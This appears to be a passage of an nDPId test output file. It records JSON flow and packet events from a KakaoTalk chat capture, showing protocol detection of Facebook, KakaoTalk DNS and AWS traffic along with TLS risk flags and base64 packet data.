{"version":"TLSv1","client_requested_server_name":"","ja3":"dff8a0aa1c904aaea76c5bf624e88333","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}}
01009{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":232,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":33,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1430069035967,"flow_last_seen":1430069036121,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1280,"flow_tot_l4_payload_len":1464,"flow_avg_l4_payload_len":209,"midstream":0,"thread_ts_msec":1430069036121,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"31.13.68.84","src_port":45213,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS Version (1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"4":"DPI"},"proto":"TLS.Facebook","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1","client_requested_server_name":"","ja3":"dff8a0aa1c904aaea76c5bf624e88333","ja3s":"6c13ac74a6f75099ef2480748e5d94d2","unsafe_cipher":0,"cipher":"TLS_ECDHE_ECDSA_WITH_RC4_128_SHA"}}
01799{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":240,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":33,"flow_state":"info","flow_packets_processed":13,"flow_first_seen":1430069035967,"flow_last_seen":1430069036179,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1280,"flow_tot_l4_payload_len":3732,"flow_avg_l4_payload_len":287,"midstream":0,"thread_ts_msec":1430069036179,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"31.13.68.84","src_port":45213,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS Version (1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"4":"DPI"},"proto":"TLS.Facebook","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1","client_requested_server_name":"","server_names":"*.facebook.com,facebook.com,*.fbsbx.com,*.fbcdn.net,*.xx.fbcdn.net,*.xy.fbcdn.net,fb.com,*.fb.com,*.facebookcorewwwi.onion,facebookcorewwwi.onion,*.fbcdn23dssr3jqnq.onion,fbcdn23dssr3jqnq.onion,*.fbsbx2q4mvcl63pw.onion,fbsbx2q4mvcl63pw.onion,*.m.facebook.com,*.messenger.com,messenger.com,*.m.facebookcorewwwi.onion,*.xx.fbcdn23dssr3jqnq.onion,xx.fbcdn23dssr3jqnq.onion,*.xy.fbcdn23dssr3jqnq.onion,xy.fbcdn23dssr3jqnq.onion,*.xz.fbcdn.net,xz.fbcdn.net,*.xz.fbcdn23dssr3jqnq.onion,xz.fbcdn23dssr3jqnq.onion,m.facebookcorewwwi.onion","ja3":"dff8a0aa1c904aaea76c5bf624e88333","ja3s":"6c13ac74a6f75099ef2480748e5d94d2","unsafe_cipher":0,"cipher":"TLS_ECDHE_ECDSA_WITH_RC4_128_SHA","issuerDN":"C=US, O=DigiCert Inc, OU=www.digicert.com, CN=DigiCert High Assurance CA-3","subjectDN":"C=US, ST=CA, L=Menlo Park, O=Facebook, Inc., CN=*.facebook.com","fingerprint":"A4:FB:65:F8:A1:57:FE:0D:C0:17:C1:B5:51:62:63:3A:18:73:A0:B4"}}
01010{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":258,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":34,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1430069036068,"flow_last_seen":1430069036608,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1280,"flow_tot_l4_payload_len":1464,"flow_avg_l4_payload_len":209,"midstream":0,"thread_ts_msec":1430069036608,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"173.252.97.2","src_port":35511,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS Version (1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"4":"DPI"},"proto":"TLS.Facebook","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1","client_requested_server_name":"","ja3":"dff8a0aa1c904aaea76c5bf624e88333","ja3s":"6c13ac74a6f75099ef2480748e5d94d2","unsafe_cipher":0,"cipher":"TLS_ECDHE_ECDSA_WITH_RC4_128_SHA"}}
01799{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":260,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":34,"flow_state":"info","flow_packets_processed":9,"flow_first_seen":1430069036068,"flow_last_seen":1430069036612,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1280,"flow_tot_l4_payload_len":3731,"flow_avg_l4_payload_len":414,"midstream":0,"thread_ts_msec":1430069036612,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"173.252.97.2","src_port":35511,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS Version (1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"4":"DPI"},"proto":"TLS.Facebook","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1","client_requested_server_name":"","server_names":"*.facebook.com,facebook.com,*.fbsbx.com,*.fbcdn.net,*.xx.fbcdn.net,*.xy.fbcdn.net,fb.com,*.fb.com,*.facebookcorewwwi.onion,facebookcorewwwi.onion,*.fbcdn23dssr3jqnq.onion,fbcdn23dssr3jqnq.onion,*.fbsbx2q4mvcl63pw.onion,fbsbx2q4mvcl63pw.onion,*.m.facebook.com,*.messenger.com,messenger.com,*.m.facebookcorewwwi.onion,*.xx.fbcdn23dssr3jqnq.onion,xx.fbcdn23dssr3jqnq.onion,*.xy.fbcdn23dssr3jqnq.onion,xy.fbcdn23dssr3jqnq.onion,*.xz.fbcdn.net,xz.fbcdn.net,*.xz.fbcdn23dssr3jqnq.onion,xz.fbcdn23dssr3jqnq.onion,m.facebookcorewwwi.onion","ja3":"dff8a0aa1c904aaea76c5bf624e88333","ja3s":"6c13ac74a6f75099ef2480748e5d94d2","unsafe_cipher":0,"cipher":"TLS_ECDHE_ECDSA_WITH_RC4_128_SHA","issuerDN":"C=US, O=DigiCert Inc, OU=www.digicert.com, CN=DigiCert High Assurance CA-3","subjectDN":"C=US, ST=CA, L=Menlo Park, O=Facebook, Inc., CN=*.facebook.com","fingerprint":"A4:FB:65:F8:A1:57:FE:0D:C0:17:C1:B5:51:62:63:3A:18:73:A0:B4"}}
00595{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":293,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":35,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1430069044758,"flow_last_seen":1430069044758,"flow_idle_time":7560000,"flow_min_l4_payload_len":247,"flow_max_l4_payload_len":247,"flow_tot_l4_payload_len":247,"flow_avg_l4_payload_len":247,"midstream":1,"thread_ts_msec":1430069044758,"l3_proto":"ip4","src_ip":"139.150.0.125","dst_ip":"10.24.82.188","src_port":443,"dst_port":46947,"l4_proto":"tcp","flow_datalink":113,"flow_max_packets":3}
00803{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":293,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":35,"flow_packet_id":1,"flow_last_seen":1430069044758,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":303,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":303,"pkt_l4_len":267,"thread_ts_msec":1430069044758,"pkt":"AAACEgAAAAAAAAAAAAAIAEUAAR8KJUAAjgb4zIuWAH0KGFK8Abu3Y2Ij0KVRKAPiUBigLueuAADzAAAApDlIVrVdqRc+Gkt7POZ3i2OlkuY4MMfPTZY9G4U0YFfr\/Io7pOCQe3JDBNAmPdEpHGIlOOWztPzNgfmCZdfJbXa\/FjyLrCbe\/cKrmuhEYDyIPsoQcOHY3YFPdOkSmKChheXsyu06po9uQ1CWTJDZfqoByGUY9M3+\/torvsssHclmFyrgMhiQBPDR+\/p96Y\/\/sK6VRP8W+SfBO5i7Jg3brhWvS81m7IbytFR73ZERAlFn0QejuZzhem715ywfbXU8ySrwRBK2cs3ywClzqW\/s7h0teJNcn45XHRR+Z0ZTPA29+kHM57k5C1faf1I\/3jeLMDw\/"}
00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":295,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":35,"flow_packet_id":2,"flow_last_seen":1430069044836,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":56,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":56,"pkt_l4_len":20,"thread_ts_msec":1430069044836,"pkt":"AAQCEgAAAAAAAAAAAAAIAEUAACjTekAAQAZ+bgoYUryLlgB9t2MBu1EoA+JiI9GcUBCIgOkBAAA="}
00519{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":296,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":35,"flow_packet_id":3,"flow_last_seen":1430069044940,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":98,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":98,"pkt_l4_len":62,"thread_ts_msec":1430069044940,"pkt":"AAQCEgAAAAAAAAAAAAAIAEUAAFLTe0AAQAZ+QwoYUryLlgB9t2MBu1EoA+JiI9GcUBiIgH9kAAAmAAAApDlIVrVdqRc+Gkt7POZ3i2OlX+Y4MArPTZYlBp4hfXC7UiHVW\/8="}
00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":298,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":31,"flow_packet_id":3,"flow_last_seen":1430069048642,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":56,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":56,"pkt_l4_len":20,"thread_ts_msec":1430069048642,"pkt":"AAACEgAAAAAAAAAAAAAIAEUAACgkakAAjgapGtJn8A8KGFK8AbulXNdU3uvmK0ykUBSkj1vNAAA="}
00593{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":308,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":36,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1430069049770,"flow_last_seen":1430069049770,"flow_idle_time":7560000,"flow_min_l4_payload_len":96,"flow_max_l4_payload_len":96,"flow_tot_l4_payload_len":96,"flow_avg_l4_payload_len":96,"midstream":1,"thread_ts_msec":1430069049770,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"173.194.72.188","src_port":34686,"dst_port":5228,"l4_proto":"tcp","flow_datalink":113,"flow_max_packets":3}
00609{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":308,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":36,"flow_packet_id":1,"flow_last_seen":1430069049770,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":164,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":164,"pkt_l4_len":128,"thread_ts_msec":1430069049770,"pkt":"AAQCEgAAAAAAAAAAAAAIAEUAAJSUZ0AAQAZSqgoYUrytwki8h34UbGWkOWcyCtXvgBgB12cmAAABAQgKAAKaQHWhBxYXAwEAW9BJTUK7bhQDJS6M4k2xveYn3KZ2THpi3b2p1WnyM44nZ0651+YzJehbLb+jV4nNEd4GZbKLQU+P8abQYninXFhPSKcNuFppnDwsImxNyj3HrOvurwOWRZpYp3o="}
00592{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":325,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":37,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1430069060011,"flow_last_seen":1430069060011,"flow_idle_time":7560000,"flow_min_l4_payload_len":27,"flow_max_l4_payload_len":27,"flow_tot_l4_payload_len":27,"flow_avg_l4_payload_len":27,"midstream":1,"thread_ts_msec":1430069060011,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"216.58.220.174","src_port":49217,"dst_port":443,"l4_proto":"tcp","flow_datalink":113,"flow_max_packets":3}
00498{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":325,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":37,"flow_packet_id":1,"flow_last_seen":1430069060011,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":83,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":83,"pkt_l4_len":47,"thread_ts_msec":1430069060011,"pkt":"AAQCEgAAAAAAAAAAAAAIAEUAAENCkUAAQAbmZgoYUrzYOtyuwEEBuxTXAEVlWZivUBiMAAFrAAAVAwEAFnnuS9reX0mqADPiihp3NglZFsDnKQA="}
00480{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":341,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":30,"flow_packet_id":2,"flow_last_seen":1430069072945,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":68,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":68,"pkt_l4_len":32,"thread_ts_msec":1430069072945,"pkt":"AAQCEgAAAAAAAAAAAAAIAEUAADTTnkAAQAbVigoYUrw2\/\/3H5i8UZ+uf0YYGiXPCgBQCY5HBAAABAQgKAAKjTTTnT0k="}
00589{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":342,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":38,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1430069072986,"flow_last_seen":1430069072986,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1430069072986,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"54.255.253.199","src_port":58964,"dst_port":5223,"l4_proto":"tcp","flow_datalink":113,"flow_max_packets":3}
00492{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":342,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":38,"flow_packet_id":1,"flow_last_seen":1430069072986,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":76,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":76,"pkt_l4_len":40,"thread_ts_msec":1430069072986,"pkt":"AAQCEgAAAAAAAAAAAAAIAEUAADwsMEAAQAZ88QoYUrw2\/\/3H5lQUZzqvj2AAAAAAoAI2sJHJAAACBAV4BAIICgACo1AAAAAAAQMDBQ=="}
00492{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":343,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":38,"flow_packet_id":2,"flow_last_seen":1430069073186,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":76,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":76,"pkt_l4_len":40,"thread_ts_msec":1430069073186,"pkt":"AAACEgAAAAAAAAAAAAAIAEUAADwAAEAALQa8ITb\/\/ccKGFK8FGfmVG+Fj0U6r49hoBJF6jkFAAACBAV4BAIICjTom84AAqNQAQMDCA=="}
00480{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":344,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":38,"flow_packet_id":3,"flow_last_seen":1430069073186,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":68,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":68,"pkt_l4_len":32,"thread_ts_msec":1430069073186,"pkt":"AAQCEgAAAAAAAAAAAAAIAEUAADQsMUAAQAZ8+AoYUrw2\/\/3H5lQUZzqvj2FvhY9GgBABtpHBAAABAQgKAAKjZTTom84="}
01084{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":345,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":38,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1430069072986,"flow_last_seen":1430069073201,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":78,"flow_tot_l4_payload_len":78,"flow_avg_l4_payload_len":19,"midstream":0,"thread_ts_msec":1430069073201,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"54.255.253.199","src_port":58964,"dst_port":5223,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"7": {"risk":"Obsolete TLS Version (1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"4":"DPI"},"proto":"TLS.AmazonAWS","breed":"Acceptable","category":"Cloud"},"tls": {"version":"TLSv1","client_requested_server_name":"","ja3":"d9ce50c62ab1fd5932da3c6b6d406c65","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}}
00690{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":347,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1430069022058,"flow_last_seen":1430069022094,"flow_idle_time":180000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":86,"flow_tot_l4_payload_len":126,"flow_avg_l4_payload_len":63,"midstream":0,"thread_ts_msec":1430069073299,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"10.188.1.1","src_port":41909,"dst_port":53,"l4_proto":"udp","flow_datalink":113,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.KakaoTalk","breed":"Acceptable","category":"Chat"}}
00695{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":347,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":21,"flow_state":"finished","flow_packets_processed":10,"flow_first_seen":1430069030508,"flow_last_seen":1430069052317,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":283,"flow_tot_l4_payload_len":470,"flow_avg_l4_payload_len":47,"midstream":0,"thread_ts_msec":1430069073299,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"31.13.68.84","src_port":37553,"dst_port":80,"l4_proto":"tcp","flow_datalink":113,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.Facebook","breed":"Fun","category":"SocialNetwork"}}
00695{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":347,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":32,"flow_state":"finished","flow_packets_processed":11,"flow_first_seen":1430069035840,"flow_last_seen":1430069057806,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":283,"flow_tot_l4_payload_len":470,"flow_avg_l4_payload_len":42,"midstream":0,"thread_ts_msec":1430069073299,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"31.13.68.84","src_port":37557,"dst_port":80,"l4_proto":"tcp","flow_datalink":113,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.Facebook","breed":"Fun","category":"SocialNetwork"}}
00695{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":347,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":21,"flow_state":"finished","flow_packets_processed":10,"flow_first_seen":1430069030508,"flow_last_seen":1430069052317,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":283,"flow_tot_l4_payload_len":470,"flow_avg_l4_payload_len":47,"midstream":0,"thread_ts_msec":1430069073299,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"31.13.68.84","src_port":37553,"dst_port":80,"l4_proto":"tcp","flow_datalink":113,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.Facebook","breed":"Fun","category":"SocialNetwork"}}
00695{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":347,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":32,"flow_state":"finished","flow_packets_processed":11,"flow_first_seen":1430069035840,"flow_last_seen":1430069057806,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":283,"flow_tot_l4_payload_len":470,"flow_avg_l4_payload_len":42,"midstream":0,"thread_ts_msec":1430069073299,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"31.13.68.84","src_port":37557,"dst_port":80,"l4_proto":"tcp","flow_datalink":113,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.Facebook","breed":"Fun","category":"SocialNetwork"}}
00692{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":347,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":25,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1430069030978,"flow_last_seen":1430069031017,"flow_idle_time":180000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":94,"flow_tot_l4_payload_len":130,"flow_avg_l4_payload_len":65,"midstream":0,"thread_ts_msec":1430069073299,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"10.188.1.1","src_port":19582,"dst_port":53,"l4_proto":"udp","flow_datalink":113,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Facebook","breed":"Fun","category":"SocialNetwork"}}
00835{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":347,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":26,"flow_state":"finished","flow_packets_processed":34,"flow_first_seen":1430069031042,"flow_last_seen":1430069032022,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1280,"flow_tot_l4_payload_len":7723,"flow_avg_l4_payload_len":227,"midstream":0,"thread_ts_msec":1430069073299,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"31.13.68.70","src_port":43581,"dst_port":443,"l4_proto":"tcp","flow_datalink":113,"flow_max_packets":3,"ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.Facebook","breed":"Fun","category":"SocialNetwork"}}
00838{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":347,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"finished","flow_packets_processed":38,"flow_first_seen":1430069026370,"flow_last_seen":1430069037135,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1280,"flow_tot_l4_payload_len":5411,"flow_avg_l4_payload_len":142,"midstream":0,"thread_ts_msec":1430069073299,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"173.252.97.2","src_port":35503,"dst_port":443,"l4_proto":"tcp","flow_datalink":113,"flow_max_packets":3,"ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS Version (1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"4":"DPI"},"proto":"TLS.Facebook","breed":"Fun","category":"SocialNetwork"}}
00838{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":347,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":34,"flow_state":"finished","flow_packets_processed":36,"flow_first_seen":1430069036068,"flow_last_seen":1430069065046,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1280,"flow_tot_l4_payload_len":5108,"flow_avg_l4_payload_len":141,"midstream":0,"thread_ts_msec":1430069073299,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"173.252.97.2","src_port":35511,"dst_port":443,"l4_proto":"tcp","flow_datalink":113,"flow_max_packets":3,"ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS Version (1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"4":"DPI"},"proto":"TLS.Facebook","breed":"Fun","category":"SocialNetwork"}}
00663{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":347,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":30,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1430069031611,"flow_last_seen":1430069072945,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":45,"flow_tot_l4_payload_len":45,"flow_avg_l4_payload_len":22,"midstream":1,"thread_ts_msec":1430069073299,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"54.255.253.199","src_port":58927,"dst_port":5223,"l4_proto":"tcp","ndpi": {"confidence": {"2":"Match by IP"},"proto":"TLS.AmazonAWS","breed":"Acceptable","category":"Cloud"}}
00592{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":347,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":30,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1430069031611,"flow_last_seen":1430069072945,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":45,"flow_tot_l4_payload_len":45,"flow_avg_l4_payload_len":22,"midstream":1,"thread_ts_msec":1430069073299,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"54.255.253.199","src_port":58927,"dst_port":5223,"l4_proto":"tcp","flow_datalink":113,"flow_max_packets":3}
00598{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":347,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":38,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1430069072986,"flow_last_seen":1430069073299,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1388,"flow_tot_l4_payload_len":1466,"flow_avg_l4_payload_len":244,"midstream":0,"thread_ts_msec":1430069073299,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"54.255.253.199","src_port":58964,"dst_port":5223,"l4_proto":"tcp","flow_datalink":113,"flow_max_packets":3}
00835{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":347,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":26,"flow_state":"finished","flow_packets_processed":34,"flow_first_seen":1430069031042,"flow_last_seen":1430069032022,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1280,"flow_tot_l4_payload_len":7723,"flow_avg_l4_payload_len":227,"midstream":0,"thread_ts_msec":1430069073299,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"31.13.68.70","src_port":43581,"dst_port":443,"l4_proto":"tcp","flow_datalink":113,"flow_max_packets":3,"ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.Facebook","breed":"Fun","category":"SocialNetwork"}}
00838{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":347,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"finished","flow_packets_processed":38,"flow_first_seen":1430069026370,"flow_last_seen":1430069037135,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1280,"flow_tot_l4_payload_len":5411,"flow_avg_l4_payload_len":142,"midstream":0,"thread_ts_msec":1430069073299,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"173.252.97.2","src_port":35503,"dst_port":443,"l4_proto":"tcp","flow_datalink":113,"flow_max_packets":3,"ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS Version (1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"4":"DPI"},"proto":"TLS.Facebook","breed":"Fun","category":"SocialNetwork"}}
00838{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":347,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":34,"flow_state":"finished","flow_packets_processed":36,"flow_first_seen":1430069036068,"flow_last_seen":1430069065046,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1280,"flow_tot_l4_payload_len":5108,"flow_avg_l4_payload_len":141,"midstream":0,"thread_ts_msec":1430069073299,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"173.252.97.2","src_port":35511,"dst_port":443,"l4_proto":"tcp","flow_datalink":113,"flow_max_packets":3,"ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS Version (1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"4":"DPI"},"proto":"TLS.Facebook","breed":"Fun","category":"SocialNetwork"}}
